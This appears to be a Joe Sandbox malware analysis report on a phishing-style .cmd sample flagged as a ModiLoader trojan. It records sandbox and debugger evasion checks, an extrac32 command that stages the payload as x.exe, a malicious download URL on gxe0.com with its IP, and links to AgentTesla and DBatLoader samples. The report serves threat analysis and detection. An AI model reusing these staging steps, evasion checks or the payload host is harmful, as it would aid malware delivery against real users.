Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Allocates many large memory junks

Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 2B80000 memory commit 500006912	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 2B81000 memory commit 500178944	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 2BAC000 memory commit 500002816	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 2BAD000 memory commit 500199424	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 2BDE000 memory commit 501014528	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 2CD6000 memory commit 500006912	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 2CD8000 memory commit 500015104	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B858B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

4_2_02B858B4

Source: Amcache.hve.8.dr	Binary or memory string: VMware
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.8.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.8.dr	Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
Source: Amcache.hve.8.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.8.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.8.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.8.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: x.exe, 00000004.00000002.1593176423.0000000000700000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1593176423.0000000000716000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.8.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.8.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.8.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.8.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.8.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: x.exe, 00000004.00000002.1593176423.0000000000716000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: Amcache.hve.8.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.8.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.8.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.8.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.8.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.8.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.8.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.8.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.8.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.8.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Temp\x.exe

API call chain: ExitProcess graph end node

graph_4-25442

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B9EBF0 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,

4_2_02B9EBF0

Source: C:\Users\user\AppData\Local\Temp\x.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B987A0 LoadLibraryW,GetProcAddress,FreeLibrary,

4_2_02B987A0

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\PO#5_tower_Dec162024.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	4_2_02B85A78
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: GetLocaleInfoA,	4_2_02B8A798
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: GetLocaleInfoA,	4_2_02B8A74C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	4_2_02B85B84

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B89194 GetLocalTime,

4_2_02B89194

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B8B714 GetVersionExA,

4_2_02B8B714

Source: Amcache.hve.8.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	1 Native API	1 Valid Accounts	1 Valid Accounts	1 Valid Accounts	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Access Token Manipulation	1 Access Token Manipulation	LSASS Memory	321 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	11 Process Injection	1 Virtualization/Sandbox Evasion	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	11 Process Injection	NTDS	1 System Network Connections Discovery	Distributed Component Object Model	Input Capture	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	24 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PO#5_tower_Dec162024.cmd	39%	ReversingLabs	Win32.Trojan.ModiLoader

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\x.exe	50%	ReversingLabs	Win32.Trojan.ModiLoader

Source	Detection	Scanner	Label
https://gxe0.com:443/yak2/228_Dlwloedmcwb	0%	Avira URL Cloud	safe
https://gxe0.com/yak2/228_Dlwloedmcwb	0%	Avira URL Cloud	safe
https://gxe0.com/	0%	Avira URL Cloud	safe
https://gxe0.com/yak2/228_Dlwloedmcwb7z	0%	Avira URL Cloud	safe
https://gxe0.com/yak2/228_Dlwloedmcwb?	0%	Avira URL Cloud	safe
https://gxe0.com/yak2/228_Dlwloe	0%	Avira URL Cloud	safe
https://gxe0.com/yak2/228_Dlwloedmcwbxell	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
gxe0.com	198.252.105.91	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://gxe0.com/yak2/228_Dlwloedmcwb	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://gxe0.com/yak2/228_Dlwloedmcwb7z	x.exe, 00000004.00000002.1593176423.0000000000716000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://gxe0.com/yak2/228_Dlwloedmcwbxell	x.exe, 00000004.00000002.1593176423.0000000000700000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.8.dr	false		high
https://gxe0.com:443/yak2/228_Dlwloedmcwb	x.exe, 00000004.00000002.1593176423.000000000073D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://gxe0.com/yak2/228_Dlwloedmcwb?	x.exe, 00000004.00000002.1593176423.00000000006CE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://gxe0.com/yak2/228_Dlwloe	x.exe, 00000004.00000002.1611343885.0000000020ACD000.00000004.00001000.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://gxe0.com/	x.exe, 00000004.00000002.1593176423.0000000000733000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
198.252.105.91	gxe0.com	Canada		20068	HAWKHOSTCA	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582694
Start date and time:	2024-12-31 09:43:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PO#5_tower_Dec162024.cmd
Detection:	MAL
Classification:	mal88.troj.evad.winCMD@7/6@2/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 26 Number of non-executed functions: 38
Cookbook Comments:	Found application associated with file extension: .cmd

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.182.143.212, 52.168.117.173, 40.126.32.133, 4.245.163.56
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: PO#5_tower_Dec162024.cmd

Simulations

Behavior and APIs

Time	Type	Description
03:44:09	API Interceptor	1x Sleep call for process: x.exe modified
03:44:27	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
198.252.105.91	DHL-INVOICE-MBV.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.legaldanaa.com/d0ad/?jXu=gWBUvkz7Th1w/4or5wJyBYQATVQKYMhDH/gPz8FNlyuh7t8wp+tSlul7hgK6xuyfJYQ1BxvuzK7AKBkx6IgPVHnLyXh5nXmxBA==&hZ=5jUpdPs

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
gxe0.com	C6dAUcOA6M.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	198.252.105.91
	2jbMIxCFsK.exe	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
	RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
	IBKB.vbs	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	198.252.105.91
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	198.252.105.91
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	198.252.105.91
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
	x.exe	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
	TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HAWKHOSTCA	C6dAUcOA6M.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	198.252.105.91
	2jbMIxCFsK.exe	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
	Payroll List.exe	Get hash	malicious	FormBook	Browse	198.252.98.54
	RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
	IBKB.vbs	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	198.252.105.91
	MV KODCO.exe	Get hash	malicious	FormBook	Browse	198.252.98.54
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	198.252.105.91
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	198.252.105.91
	Arrival Notice_pdf.exe	Get hash	malicious	FormBook	Browse	198.252.98.54
	PROFORMA INVOICE.exe	Get hash	malicious	FormBook	Browse	198.252.98.54

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	x6VtGfW26X.exe	Get hash	malicious	LummaC	Browse	198.252.105.91
	re5.mp4.hta	Get hash	malicious	LummaC	Browse	198.252.105.91
	Poket.mp4.hta	Get hash	malicious	LummaC	Browse	198.252.105.91
	Exlan_setup_v3.1.2.exe	Get hash	malicious	LummaC	Browse	198.252.105.91
	Set-up.exe	Get hash	malicious	LummaC, GO Backdoor, LummaC Stealer	Browse	198.252.105.91
	Setup.exe	Get hash	malicious	LummaC	Browse	198.252.105.91
	X-mas_2.3.2.exe	Get hash	malicious	LummaC	Browse	198.252.105.91
	ReploidReplic.exe	Get hash	malicious	LummaC	Browse	198.252.105.91
	Bootstrapper.exe	Get hash	malicious	LummaC	Browse	198.252.105.91
	Launcher.exe	Get hash	malicious	LummaC	Browse	198.252.105.91

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_x.exe_cda35a32461957b827c9f2408e85ccfa22b656_a734f2ad_909ad5be-1645-4108-b456-5da8ed9904cf\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0938670565180482
Encrypted:	false
SSDEEP:	192:Izq6CDnb0BU/gj7F6N1hbzuiFcZ24IO8UZW:Gq6wnoBU/gjCbzuiFcY4IO8UZ
MD5:	CE43F5DD9C5FFC273403683F68C5719D
SHA1:	3724AE41326667750D52B27E8451102386270DA4
SHA-256:	8540E140B4C8382B2C158A4EDB05B344A0FBD80D9877A014A9F81A53287FDB54
SHA-512:	07D67636570019CC5DAB92EDC45E3C8AE0787CB152567881EE9ADB1146448DE5A83A95DD1787F8728F841F8E3828F4AEA12EF5A2D271DABC9EBC80009D6ABB70
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.1.0.8.2.5.7.4.8.9.0.9.8.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.1.0.8.2.6.0.2.3.9.0.8.6.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.0.9.a.d.5.b.e.-.1.6.4.5.-.4.1.0.8.-.b.4.5.6.-.5.d.a.8.e.d.9.9.0.4.c.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.e.8.5.5.a.5.8.-.7.4.b.0.-.4.8.6.c.-.8.4.c.a.-.2.f.8.d.8.6.3.6.7.3.3.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.x...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.a.4.-.0.0.0.1.-.0.0.1.4.-.a.3.1.f.-.9.9.2.8.6.0.5.b.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.7.2.8.2.e.3.f.f.7.a.5.4.c.2.a.2.8.8.8.d.c.7.4.3.5.c.5.0.7.4.6.0.0.0.0.0.9.0.4.!.0.0.0.0.a.9.2.5.6.9.c.5.a.a.d.2.7.3.4.8.c.d.c.0.8.4.b.3.b.6.8.9.a.4.e.2.8.e.e.c.1.c.9.a.!.x...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.9.2././.0.6././.1.9.:.2.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER23EE.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Dec 31 08:44:19 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	128668
Entropy (8bit):	2.0693616279428264
Encrypted:	false
SSDEEP:	384:5IVaEOqbMaE4QxxId1pFaqp20fRZNgLsG3d8MCp+TB4T8agYD/Sp82TtbVAHEC:UF5E4Qxxo3Um2OvNgLX2/bAt6CBXA
MD5:	A6485C432C150C3CCEA4E0F28BE57DC6
SHA1:	59C1FB4DE3B72E772CA00AAE78B1E6D4BD926860
SHA-256:	07F43F29DD66284E8F7ABC5792708A15D882C1CF43F2418684B9649BFD7A3CDA
SHA-512:	E2E72F7C9D86DF42878188840034DFB2E8E0764F84EC2BE23D1664B206819D50530C6B5A18BE3490BB4DA894F071F75504587127BF9BB50B34B43298CC949285
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ........sg............D........... ...X...........x&...........Z..........`.......8...........T............T...............)...........*..............................................................................eJ.......+......GenuineIntel............T............sg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2CAA.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8270
Entropy (8bit):	3.6935067441795693
Encrypted:	false
SSDEEP:	192:R6l7wVeJb5+6FcSNi6YsQKSMgmf14cffprT89bnssf4Nm:R6lXJt+6VNi6YZKSMgmf14c+n/fP
MD5:	A56AC4874FAD286C6C9653C891592442
SHA1:	12FA8960ECD37F83344D03F3763D7DFFE27F2C54
SHA-256:	9E1A15B1DBBEB5CEB3AEDB96FA192C992323D417DC956CED6722BDECC8343200
SHA-512:	76FBC6E4CE5F14D9B5093798DA83387E03BB976FC8BE697CFE5668BCE41CA16E56866E794F9F4534E1CD6E346BCD206A400E76E783053925B8FA437CBD1A852C
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.8.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D08.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4564
Entropy (8bit):	4.454536772653565
Encrypted:	false
SSDEEP:	48:cvIwWl8zsnQJg77aI9iksnWpW8VYNYm8M4JzPJFkc+q8metXGSwJzhQd:uIjfWI7Rx7VBJUcc2SwJzhQd
MD5:	FA02AA26115DEB789DB83388C4D11FD8
SHA1:	CEB003708DD32FA2DEF5E7D49FAC8905A05753DB
SHA-256:	404D6F003D869353B2A5FA94F33906222AA3314A68E1A3C85E649D68B71BDDC0
SHA-512:	53E4FC2C83C7B964ED468496E95EC56EE38B1C24437D09767AF2A4CD9770A02A0A5191FD15AC93F25C04983F1757C4F80CA90BC2D21E7198DF69D2574C7159A9
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="655187" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Temp\x.exe

Download File

Process:	C:\Windows\System32\extrac32.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	953856
Entropy (8bit):	7.036454476387899
Encrypted:	false
SSDEEP:	24576:Z7sP5Kw0G1OAc8msbN0o2jDGHfPMFQJQI/zNz:Z8o9G1bwcfPMFQJQI/zNz
MD5:	6C1C692B2DE02C5CE02A5D2D27117851
SHA1:	A92569C5AAD27348CDC084B3B689A4E28EEC1C9A
SHA-256:	2A963D521B95C852076935883CFC674EA8FC09501581F85A066EA1EF30F4516B
SHA-512:	AD70CFD6C08DDF55120B1C35059313B5FCA9FD38104FDFF92E8B4ECB420074CBCA736E61598AC1C1DD781AC36E128577498D2561C82209AB94BFAD29EE1866D6
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\x.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Reputation:	low
